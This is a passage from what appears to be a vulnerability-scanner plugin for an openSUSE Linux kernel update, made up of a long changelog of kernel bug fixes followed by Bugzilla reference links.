per-VCPU (bnc#1012382).\n\n - kvm/x86: Add IBPB support (bnc#1012382 bsc#1068032\n bsc#1068032).\n\n - kvm/x86: fix empty-body warnings (bnc#1012382).\n\n - kvm/x86: Remove indirect MSR op calls from SPEC_CTRL\n (bnc#1012382).\n\n - kvm/x86: Use jmp to invoke kvm_spurious_fault() from\n .fixup (bnc#1012382).\n\n - leds: call led_pwm_set() in leds-pwm to enforce default\n LED_OFF (bnc#1012382).\n\n - leds: leds-gpio: Fix return value check in\n create_gpio_led() (bnc#1012382).\n\n - leds: turn off the LED and wait for completion on\n unregistering LED class device (bnc#1012382).\n\n - libata: whitelist all SAMSUNG MZ7KM* solid-state disks\n (bnc#1012382).\n\n - libceph: fall back to sendmsg for slab pages\n (bsc#1118316).\n\n - libfc: sync strings with upstream versions\n (bsc#1114763).\n\n - lib/interval_tree_test.c: allow full tree search\n (bnc#1012382).\n\n - lib/interval_tree_test.c: allow users to limit scope of\n endpoint (bnc#1012382).\n\n - lib/interval_tree_test.c: make test options module\n parameters (bnc#1012382).\n\n - libnvdimm, (btt, blk): do integrity setup before\n add_disk() (bsc#1118926).\n\n - libnvdimm, dimm: fix dpa reservation vs uninitialized\n label area (bsc#1118936).\n\n - libnvdimm: fix integer overflow static analysis warning\n (bsc#1118922).\n\n - libnvdimm: fix nvdimm_bus_lock() vs device_lock()\n ordering (bsc#1118915).\n\n - lib/rbtree_test.c: make input module parameters\n (bnc#1012382).\n\n - lib/rbtree-test: lower default params (bnc#1012382).\n\n - llc: do not use sk_eat_skb() (bnc#1012382).\n\n - loop: Fix double mutex_unlock(&loop_ctl_mutex) in\n loop_control_ioctl() (bnc#1012382).\n\n - loop: Fold __loop_release into loop_release\n (bnc#1012382).\n\n - loop: Get rid of loop_index_mutex (bnc#1012382).\n\n - LSM: Check for NULL cred-security on free (bnc#1012382).\n\n - mac80211: Clear beacon_int in ieee80211_do_stop\n (bnc#1012382).\n\n - mac80211: fix reordering of buffered broadcast packets\n (bnc#1012382).\n\n - 
mac80211_hwsim: fix module init error paths for netlink\n (bnc#1012382).\n\n - mac80211_hwsim: Timer should be initialized before\n device registered (bnc#1012382).\n\n - mac80211: ignore NullFunc frames in the duplicate\n detection (bnc#1012382).\n\n - mac80211: ignore tx status for PS stations in\n ieee80211_tx_status_ext (bnc#1012382).\n\n - matroxfb: fix size of memcpy (bnc#1012382).\n\n - md: batch flush requests (bsc#1119680).\n\n - md: do not check MD_SB_CHANGE_CLEAN in md_allow_write\n (Git-fixes).\n\n - media: dvb-frontends: fix i2c access helpers for KASAN\n (bnc#1012382).\n\n - media: em28xx: Fix misplaced reset of\n dev->v4l::field_count (bnc#1012382).\n\n - media: em28xx: Fix use-after-free when disconnecting\n (bnc#1012382).\n\n - media: firewire: Fix app_info parameter type in\n avc_ca(,_app)_info (bnc#1012382).\n\n - media: vb2: be sure to unlock mutex on errors\n (bnc#1012382).\n\n - media: vb2: vb2_mmap: move lock up (bnc#1012382).\n\n - media: vivid: fix error handling of kthread_run\n (bnc#1012382).\n\n - media: vivid: free bitmap_cap when updating\n std/timings/etc (bnc#1012382).\n\n - media: vivid: set min width/height to a value > 0\n (bnc#1012382).\n\n - mfd: tps6586x: Handle interrupts on suspend\n (bnc#1012382).\n\n - mips: Align kernel load address to 64KB (bnc#1012382).\n\n - mips: Ensure pmd_present() returns false after\n pmd_mknotpresent() (bnc#1012382).\n\n - mips: fix mips_get_syscall_arg o32 check (bnc#1012382).\n\n - mips: fix n32 compat_ipc_parse_version (bnc#1012382).\n\n - mips: ralink: Fix mt7620 nd_sd pinmux (bnc#1012382).\n\n - MIPS: SiByte: Enable swiotlb for SWARM, LittleSur and\n BigSur (bnc#1012382).\n\n - misc: mic/scif: fix copy-paste error in\n scif_create_remote_lookup (bnc#1012382).\n\n - mmc: atmel-mci: do not assume idle after\n atmci_request_end (bnc#1012382).\n\n - mmc: core: Reset HPI enabled state during re-init and in\n case of errors (bnc#1012382).\n\n - mm: cleancache: fix corruption on missed inode\n 
invalidation (bnc#1012382).\n\n - MMC: OMAP: fix broken MMC on OMAP15XX/OMAP5910/OMAP310\n (bnc#1012382).\n\n - mmc: omap_hsmmc: fix DMA API warning (bnc#1012382).\n\n - mm, devm_memremap_pages: kill mapping 'System RAM'\n support (bnc#1012382).\n\n - mm: do not miss the last page because of round-off error\n (bnc#1118798).\n\n - mm, hugetlb: fix huge_pte_alloc BUG_ON (bsc#1119204).\n\n - mm: hwpoison: call shake_page() after try_to_unmap() for\n mlocked page (bnc#1116336).\n\n - mm: lower the printk loglevel for __dump_page messages\n (generic hotplug debugability).\n\n - mm, memory_hotplug: be more verbose for memory offline\n failures (generic hotplug debugability).\n\n - mm, memory_hotplug: drop pointless block alignment\n checks from __offline_pages (generic hotplug\n debugability).\n\n - mm, memory_hotplug: print reason for the offlining\n failure (generic hotplug debugability).\n\n - mm: mlock: avoid increase mm->locked_vm on mlock() when\n already mlock2(,MLOCK_ONFAULT) (bnc#1012382).\n\n - mm/nommu.c: Switch __get_user_pages_unlocked() to use\n __get_user_pages() (bnc#1012382).\n\n - mm: only report isolation failures when offlining memory\n (generic hotplug debugability).\n\n - mm/page-writeback.c: do not break integrity writeback on\n ->writepage() error (bnc#1012382).\n\n - mm: Preserve _PAGE_DEVMAP across mprotect() calls\n (bsc#1118790).\n\n - mm: print more information about mapping in __dump_page\n (generic hotplug debugability).\n\n - mm, proc: be more verbose about unstable VMA flags in\n /proc/<pid>/smaps (bnc#1012382).\n\n - mm: put_and_wait_on_page_locked() while page is migrated\n (bnc#1109272).\n\n - mm: remove write/force parameters from\n __get_user_pages_locked() (bnc#1012382 bsc#1027260).\n\n - mm: remove write/force parameters from\n __get_user_pages_unlocked() (bnc#1012382 bsc#1027260).\n\n - mm: replace __access_remote_vm() write parameter with\n gup_flags (bnc#1012382).\n\n - mm: replace access_remote_vm() write parameter with\n 
gup_flags (bnc#1012382).\n\n - mm: replace get_user_pages_locked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages_unlocked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages() write/force parameters with\n gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_vaddr_frames() write/force parameters\n with gup_flags (bnc#1012382).\n\n - mm, slab: faster active and free stats (bsc#116653, VM\n Performance).\n\n - mm/slab: improve performance of gathering slabinfo stats\n (bsc#116653, VM Performance).\n\n - mm, slab: maintain total slab count instead of active\n count (bsc#116653, VM Performance).\n\n - Move patches to sorted range, p1\n\n - mv88e6060: disable hardware level MAC learning\n (bnc#1012382).\n\n - mwifiex: Fix NULL pointer dereference in skb_dequeue()\n (bnc#1012382).\n\n - mwifiex: fix p2p device does not find in scan problem\n (bnc#1012382).\n\n - namei: allow restricted O_CREAT of FIFOs and regular\n files (bnc#1012382).\n\n - neighbour: Avoid writing before skb->head in\n neigh_hh_output() (bnc#1012382).\n\n - net: 8139cp: fix a BUG triggered by changing mtu with\n network traffic (bnc#1012382).\n\n - net: amd: add missing of_node_put() (bnc#1012382).\n\n - net: bcmgenet: fix OF child-node lookup (bnc#1012382).\n\n - net: bridge: fix a bug on using a neighbour cache entry\n without checking its state (bnc#1012382).\n\n - net: call sk_dst_reset when set SO_DONTROUTE\n (bnc#1012382).\n\n - net: ena: fix crash during ena_remove() (bsc#1108240).\n\n - net: ena: update driver version from 2.0.1 to 2.0.2\n (bsc#1108240).\n\n - net: faraday: ftmac100: remove netif_running(netdev)\n check before disabling interrupts (bnc#1012382).\n\n - netfilter: nf_tables: fix oops when inserting an element\n into a verdict map (bnc#1012382).\n\n - net: hisilicon: remove unexpected free_netdev\n (bnc#1012382).\n\n - net/ibmvnic: Fix RTNL deadlock during device reset\n 
(bnc#1115431).\n\n - net: ipv4: do not handle duplicate fragments as\n overlapping (bsc#1116345).\n\n - net/mlx4_core: Correctly set PFC param if global pause\n is turned off (bsc#1015336 bsc#1015337 bsc#1015340).\n\n - net/mlx4_core: Fix uninitialized variable compilation\n warning (bnc#1012382).\n\n - net/mlx4_core: Zero out lkey field in SW2HW_MPT fw\n command (bnc#1012382).\n\n - net/mlx4: Fix UBSAN warning of signed integer overflow\n (bnc#1012382).\n\n - net: phy: do not allow __set_phy_supported to add\n unsupported modes (bnc#1012382).\n\n - net: Prevent invalid access to skb->prev in\n __qdisc_drop_all (bnc#1012382).\n\n - netrom: fix locking in nr_find_socket() (bnc#1012382).\n\n - net: speed up skb_rbtree_purge() (bnc#1012382).\n\n - net: thunderx: fix NULL pointer dereference in\n nic_remove (bnc#1012382).\n\n - nfc: nfcmrvl_uart: fix OF child-node lookup\n (bnc#1012382).\n\n - nfit: skip region registration for incomplete control\n regions (bsc#1118930).\n\n - nfsv4: Do not exit the state manager without clearing\n NFS4CLNT_MANAGER_RUNNING (git-fixes).\n\n - nvme: validate controller state before rescheduling keep\n alive (bsc#1103257).\n\n - ocfs2: fix deadlock caused by ocfs2_defrag_extent()\n (bnc#1012382).\n\n - ocfs2: fix panic due to unrecovered local alloc\n (bnc#1012382).\n\n - ocfs2: fix potential use after free (bnc#1012382).\n\n - of: add helper to lookup compatible child node\n (bnc#1012382).\n\n - omap2fb: Fix stack memory disclosure (bsc#1106929)\n\n - packet: Do not leak dev refcounts on error exit\n (bnc#1012382).\n\n - packet: validate address length (bnc#1012382).\n\n - packet: validate address length if non-zero\n (bnc#1012382).\n\n - pci: altera: Check link status before retrain link\n (bnc#1012382).\n\n - pci: altera: Fix altera_pcie_link_is_up() (bnc#1012382).\n\n - pci: altera: Move retrain from fixup to\n altera_pcie_host_init() (bnc#1012382).\n\n - pci: altera: Poll for link training status after\n retraining the link 
(bnc#1012382).\n\n - pci: altera: Poll for link up status after retraining\n the link (bnc#1012382).\n\n - pci: altera: Reorder read/write functions (bnc#1012382).\n\n - pci: altera: Rework config accessors for use without a\n struct pci_bus (bnc#1012382).\n\n - perf/bpf: Convert perf_event_array to use struct file\n (bsc#1119967).\n\n - perf intel-pt: Fix error with config term 'pt=0'\n (bnc#1012382).\n\n - perf parse-events: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - perf pmu: Suppress potential format-truncation warning\n (bnc#1012382).\n\n - perf svghelper: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - pinctrl: sunxi: a83t: Fix IRQ offset typo for PH11\n (bnc#1012382).\n\n - platform/x86: asus-wmi: Tell the EC the OS will handle\n the display off hotkey (bnc#1012382).\n\n - powerpc/64s: consolidate MCE counter increment\n (bsc#1094244).\n\n - powerpc/boot: Fix random libfdt related build errors\n (bnc#1012382).\n\n - powerpc/boot: Request no dynamic linker for boot wrapper\n (bsc#1070805).\n\n - powerpc/cacheinfo: Report the correct shared_cpu_map on\n big-cores (bsc#1109695).\n\n - powerpc: Detect the presence of big-cores via 'ibm,\n thread-groups' (bsc#1109695).\n\n - powerpc: Fix COFF zImage booting on old powermacs\n (bnc#1012382).\n\n - powerpc, hotplug: Avoid to touch non-existent cpumasks\n (bsc#1109695).\n\n - powerpc: make use of for_each_node_by_type() instead of\n open-coding it (bsc#1109695).\n\n - powerpc/msi: Fix NULL pointer access in teardown code\n (bnc#1012382).\n\n - powerpc/numa: Suppress 'VPHN is not supported' messages\n (bnc#1012382).\n\n - powerpc/pseries/cpuidle: Fix preempt warning\n (bnc#1012382).\n\n - powerpc/setup: Add cpu_to_phys_id array (bsc#1109695).\n\n - powerpc/smp: Add cpu_l2_cache_map (bsc#1109695).\n\n - powerpc/smp: Add Power9 scheduler topology\n (bsc#1109695).\n\n - powerpc/smp: Rework CPU topology construction\n (bsc#1109695).\n\n - powerpc/smp: Use cpu_to_chip_id() to find core siblings\n 
(bsc#1109695).\n\n - powerpc/traps: restore recoverability of machine_check\n interrupts (bsc#1094244).\n\n - powerpc: Use cpu_smallcore_sibling_mask at SMT level on\n bigcores (bsc#1109695).\n\n - powerpc/xmon: Fix invocation inside lock region\n (bsc#1122885).\n\n - power: supply: olpc_battery: correct the temperature\n units (bnc#1012382).\n\n - proc: Remove empty line in /proc/self/status\n (bnc#1012382 bsc#1094823).\n\n - pstore: Convert console write to use ->write_buf\n (bnc#1012382).\n\n - pstore/ram: Do not treat empty buffers as valid\n (bnc#1012382).\n\n - qed: Fix bitmap_weight() check (bsc#1019695).\n\n - qed: Fix PTT leak in qed_drain() (bnc#1012382).\n\n - qed: Fix QM getters to always return a valid pq\n (bsc#1019695 ).\n\n - qed: Fix reading wrong value in loop condition\n (bnc#1012382).\n\n - r8169: Add support for new Realtek Ethernet\n (bnc#1012382).\n\n - rapidio/rionet: do not free skb before reading its\n length (bnc#1012382).\n\n - Refresh\n patches.kabi/x86-cpufeature-preserve-numbers.patch.\n (bsc#1122651)\n\n - Revert 'drm/rockchip: Allow driver to be shutdown on\n reboot/kexec' (bsc#1106929)\n\n - Revert 'exec: avoid gcc-8 warning for get_task_comm'\n (kabi).\n\n - Revert 'iommu/io-pgtable-arm: Check for v7s-incapable\n systems' (bsc#1106105).\n\n - Revert 'PCI/ASPM: Do not initialize link state when\n aspm_disabled is set' (bsc#1106105).\n\n - Revert 'usb: musb: musb_host: Enable HCD_BH flag to\n handle urb return in bottom half' (bsc#1047487).\n\n - Revert 'wlcore: Add missing PM call for\n wlcore_cmd_wait_for_event_or_timeout()' (bnc#1012382).\n\n - rocker: fix rocker_tlv_put_* functions for KASAN\n (bnc#1012382).\n\n - rtc: snvs: add a missing write sync (bnc#1012382).\n\n - rtc: snvs: Add timeouts to avoid kernel lockups\n (bnc#1012382).\n\n - rtnetlink: ndo_dflt_fdb_dump() only work for\n ARPHRD_ETHER devices (bnc#1012382).\n\n - s390/cpum_cf: Reject request for sampling in event\n initialization (bnc#1012382).\n\n - s390/mm: Check 
for valid vma before zapping in\n gmap_discard (bnc#1012382).\n\n - s390/qeth: fix length check in SNMP processing\n (bnc#1012382).\n\n - sbus: char: add of_node_put() (bnc#1012382).\n\n - scsi: bfa: convert to strlcpy/strlcat (bnc#1012382\n bsc#1019683, ).\n\n - scsi: bnx2fc: Fix NULL dereference in error handling\n (bnc#1012382).\n\n - scsi: Create two versions of\n scsi_internal_device_unblock() (bsc#1119877).\n\n - scsi: csiostor: Avoid content leaks and casts\n (bnc#1012382).\n\n - scsi: Introduce scsi_start_queue() (bsc#1119877).\n\n - scsi: libiscsi: Fix NULL pointer dereference in\n iscsi_eh_session_reset (bnc#1012382).\n\n - scsi: lpfc: Add Buffer overflow check, when nvme_info\n larger than PAGE_SIZE (bsc#1102660).\n\n - scsi: lpfc: devloss timeout race condition caused NULL\n pointer reference (bsc#1102660).\n\n - scsi: lpfc: Fix abort error path for NVMET\n (bsc#1102660).\n\n - scsi: lpfc: fix block guard enablement on SLI3 adapters\n (bsc#1079935).\n\n - scsi: lpfc: Fix driver crash when re-registering NVME\n rports (bsc#1102660).\n\n - scsi: lpfc: Fix ELS abort on SLI-3 adapters\n (bsc#1102660).\n\n - scsi: lpfc: Fix list corruption on the completion queue\n (bsc#1102660).\n\n - scsi: lpfc: Fix NVME Target crash in defer rcv logic\n (bsc#1102660).\n\n - scsi: lpfc: Fix panic if driver unloaded when port is\n offline (bsc#1102660).\n\n - scsi: lpfc: update driver version to 11.4.0.7-5\n (bsc#1102660).\n\n - scsi: Make __scsi_remove_device go straight from BLOCKED\n to DEL (bsc#1119877).\n\n - scsi: megaraid: fix out-of-bound array accesses\n (bnc#1012382).\n\n - scsi: Protect SCSI device state changes with a mutex\n (bsc#1119877).\n\n - scsi: qedi: Add ISCSI_BOOT_SYSFS to Kconfig\n (bsc#1043083).\n\n - scsi: Re-export scsi_internal_device_(,un)_block()\n (bsc#1119877).\n\n - scsi: sd: Fix cache_type_store() (bnc#1012382).\n\n - scsi: Split scsi_internal_device_block() (bsc#1119877).\n\n - scsi: target: add emulate_pr backstore attr to toggle PR\n 
support (bsc#1091405).\n\n - scsi: target: drop unused pi_prot_format attribute\n storage (bsc#1091405).\n\n - scsi: target: use consistent left-aligned ASCII INQUIRY\n data (bnc#1012382).\n\n - scsi: ufs: fix bugs related to NULL pointer access and\n array size (bnc#1012382).\n\n - scsi: ufs: fix race between clock gating and devfreq\n scaling work (bnc#1012382).\n\n - scsi: ufshcd: Fix race between clk scaling and ungate\n work (bnc#1012382).\n\n - scsi: ufshcd: release resources if probe fails\n (bnc#1012382).\n\n - scsi: use 'inquiry_mutex' instead of 'state_mutex'\n (bsc#1119877).\n\n - scsi: vmw_pscsi: Rearrange code to avoid multiple calls\n to free_irq during unload (bnc#1012382).\n\n - scsi: zfcp: fix posting too many status read buffers\n leading to adapter shutdown (bnc#1012382).\n\n - sctp: allocate sctp_sockaddr_entry with kzalloc\n (bnc#1012382).\n\n - sctp: clear the transport of some out_chunk_list chunks\n in sctp_assoc_rm_peer (bnc#1012382).\n\n - sctp: initialize sin6_flowinfo for ipv6 addrs in\n sctp_inet6addr_event (bnc#1012382).\n\n - selftests: Move networking/timestamping from\n Documentation (bnc#1012382).\n\n - selinux: fix GPF on invalid policy (bnc#1012382).\n\n - seq_file: fix incomplete reset on read from zero offset\n (Git-fixes).\n\n - series.conf: Move\n 'patches.fixes/aio-hold-an-extra-file-reference-over-AIO\n -read-write.patch' into sorted section.\n\n - slab: alien caches must not be initialized if the\n allocation of the alien cache failed (bnc#1012382).\n\n - sock: Make sock->sk_stamp thread-safe (bnc#1012382).\n\n - spi: bcm2835: Avoid finishing transfer prematurely in\n IRQ mode (bnc#1012382).\n\n - spi: bcm2835: Fix book-keeping of DMA termination\n (bnc#1012382).\n\n - spi: bcm2835: Fix race on DMA termination (bnc#1012382).\n\n - spi: bcm2835: Unbreak the build of esoteric configs\n (bnc#1012382).\n\n - sr: pass down correctly sized SCSI sense buffer\n (bnc#1012382).\n\n - Staging: lustre: remove two build warnings\n 
(bnc#1012382).\n\n - staging: rts5208: fix gcc-8 logic error warning\n (bnc#1012382).\n\n - staging: speakup: Replace strncpy with memcpy\n (bnc#1012382).\n\n - sunrpc: Fix a bogus get/put in generic_key_to_expire()\n (bnc#1012382).\n\n - sunrpc: Fix a potential race in xprt_connect()\n (git-fixes).\n\n - sunrpc: fix cache_head leak due to queued request\n (bnc#1012382).\n\n - sunrpc: Fix leak of krb5p encode pages (bnc#1012382).\n\n - sunrpc: handle ENOMEM in rpcb_getport_async\n (bnc#1012382).\n\n - swiotlb: clean up reporting (bnc#1012382).\n\n - sysfs: Disable lockdep for driver bind/unbind files\n (bnc#1012382).\n\n - sysv: return 'err' instead of 0 in __sysv_write_inode\n (bnc#1012382).\n\n - target/iscsi: avoid NULL dereference in CHAP auth error\n path (bsc#1117165).\n\n - target: se_dev_attrib.emulate_pr ABI stability\n (bsc#1091405).\n\n - tcp: fix NULL ref in tail loss probe (bnc#1012382).\n\n - timer/debug: Change /proc/timer_list from 0444 to 0400\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_bearer_enable\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_doit\n (bnc#1012382).\n\n - tipc: fix uninit-value in\n tipc_nl_compat_link_reset_stats (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_link_set\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_name_table_dump\n (bnc#1012382).\n\n - tmpfs: make lseek(SEEK_DATA/SEK_HOLE) return ENXIO with\n a negative offset (bnc#1012382).\n\n - tpm: fix response size validation in tpm_get_random()\n (bsc#1020645, git-fixes).\n\n - tracing: Fix bad use of igrab in trace_uprobe.c\n (bsc#1120046).\n\n - tracing: Fix memory leak in set_trigger_filter()\n (bnc#1012382).\n\n - tracing: Fix memory leak of instance function hash\n filters (bnc#1012382).\n\n - tty/ldsem: Wake up readers after timed out down_write()\n (bnc#1012382).\n\n - tty: serial: 8250_mtk: always resume the device in probe\n (bnc#1012382).\n\n - tty: wipe buffer (bnc#1012382).\n\n - tty: wipe 
buffer if not echoing data (bnc#1012382).\n\n - tun: forbid iface creation with rtnl ops (bnc#1012382).\n\n - unifdef: use memcpy instead of strncpy (bnc#1012382).\n\n - Update config files: disable f2fs in the rest configs\n (boo#1109665)\n\n - uprobes: Fix handle_swbp() vs. unregister() + register()\n race once more (bnc#1012382).\n\n - usb: Add USB_QUIRK_DELAY_CTRL_MSG quirk for Corsair K70\n RGB (bnc#1012382).\n\n - usb: appledisplay: Add 27' Apple Cinema Display\n (bnc#1012382).\n\n - usb: cdc-acm: send ZLP for Telit 3G Intel based modems\n (bnc#1012382).\n\n - usb: check usb_get_extra_descriptor for proper size\n (bnc#1012382).\n\n - usb: core: Fix hub port connection events lost\n (bnc#1012382).\n\n - usb: core: quirks: add RESET_RESUME quirk for Cherry\n G230 Stream series (bnc#1012382).\n\n - usb: gadget: dummy: fix nonsensical comparisons\n (bnc#1012382).\n\n - usbnet: ipheth: fix potential recvmsg bug and recvmsg\n bug 2 (bnc#1012382).\n\n - usb: omap_udc: fix crashes on probe error and module\n removal (bnc#1012382).\n\n - usb: omap_udc: fix omap_udc_start() on 15xx machines\n (bnc#1012382).\n\n - usb: omap_udc: fix USB gadget functionality on Palm\n Tungsten E (bnc#1012382).\n\n - usb: omap_udc: use devm_request_irq() (bnc#1012382).\n\n - usb: quirk: add no-LPM quirk on SanDisk Ultra Flair\n device (bnc#1012382).\n\n - usb: r8a66597: Fix a possible concurrency use-after-free\n bug in r8a66597_endpoint_disable() (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL668 series\n (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL678 series\n (bnc#1012382).\n\n - usb: serial: option: add GosunCn ZTE WeLink ME3630\n (bnc#1012382).\n\n - usb: serial: option: add HP lt4132 (bnc#1012382).\n\n - usb: serial: option: add Simcom SIM7500/SIM7600 (MBIM\n mode) (bnc#1012382).\n\n - usb: serial: option: add Telit LN940 series\n (bnc#1012382).\n\n - usb: serial: pl2303: add ids for Hewlett-Packard HP POS\n pole displays (bnc#1012382).\n\n - usb: storage: add 
quirk for SMI SM3350 (bnc#1012382).\n\n - usb: storage: do not insert sane sense for SPC3+ when\n bad sense specified (bnc#1012382).\n\n - usb: usb-storage: Add new IDs to ums-realtek\n (bnc#1012382).\n\n - usb: xhci: fix timeout for transition from RExit to U0\n (bnc#1012382).\n\n - usb: xhci: fix uninitialized completion when USB3 port\n got wrong status (bnc#1012382).\n\n - usb: xhci: Prevent bus suspend if a port connect change\n or polling state is detected (bnc#1012382).\n\n - v9fs_dir_readdir: fix double-free on p9stat_read error\n (bnc#1012382).\n\n - vfs: Avoid softlockups in drop_pagecache_sb()\n (bsc#1118505).\n\n - vhost: make sure used idx is seen before log in\n vhost_add_used_n() (bnc#1012382).\n\n - virtio/s390: avoid race on vcdev->config (bnc#1012382).\n\n - virtio/s390: fix race in ccw_io_helper() (bnc#1012382).\n\n - VSOCK: Send reset control packet when socket is\n partially bound (bnc#1012382).\n\n - writeback: do not decrement wb->refcnt if !wb->bdi (git\n fixes (writeback)).\n\n - x86/earlyprintk/efi: Fix infinite loop on some screen\n widths (bnc#1012382).\n\n - x86/entry: spell EBX register correctly in documentation\n (bnc#1012382).\n\n - x86/MCE: Export memory_error() (bsc#1114648).\n\n - x86/MCE: Make correctable error detection look at the\n Deferred bit (bsc#1114648).\n\n - x86/mtrr: Do not copy uninitialized gentry fields back\n to userspace (bnc#1012382).\n\n - x86/speculation/l1tf: Drop the swap storage limit\n restriction when l1tf=off (bnc#1114871).\n\n - x86/speculation: Use synthetic bits for IBRS/IBPB/STIBP\n (bnc#1012382).\n\n - xen/balloon: Support xend-based toolstack (bnc#1065600).\n\n - xen/netback: dont overflow meta array (bnc#1099523).\n\n - xen/netfront: tolerate frags with no data (bnc#1012382).\n\n - xen/x86: add diagnostic printout to xen_mc_flush() in\n case of error (bnc#1116183).\n\n - xen: xlate_mmu: add missing header to fix 'W=1' warning\n (bnc#1012382).\n\n - xfrm: Fix bucket count reported to userspace\n 
(bnc#1012382).\n\n - xfs: Align compat attrlist_by_handle with native\n implementation (git-fixes).\n\n - xfs: fix quotacheck dquot id overflow infinite loop\n (bsc#1121621).\n\n - xhci: Add quirk to workaround the errata seen on Cavium\n Thunder-X2 Soc (bsc#1117162).\n\n - xhci: Do not prevent USB2 bus suspend in state check\n intended for USB3 only (bnc#1012382).\n\n - xhci: Prevent U1/U2 link pm states if exit latency is\n too long (bnc#1012382).\n\n - xprtrdma: Reset credit grant properly after a disconnect\n (git-fixes).\n\n - xtensa: enable coprocessors that are being flushed\n (bnc#1012382).\n\n - xtensa: fix coprocessor context offset definitions\n (bnc#1012382).\n\n - Yama: Check for pid death before checking ancestry\n (bnc#1012382).\n\n - x86/pkeys: Properly copy pkey state at fork()\n (bsc#1106105).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1019695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1023175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1027260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1031492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1043083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1065600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1068032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079935\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1086423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1087082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1091405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094244\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1094823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096281\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1099523\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1103156\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1103257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1106105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1106929\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1107866\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109272\"\n 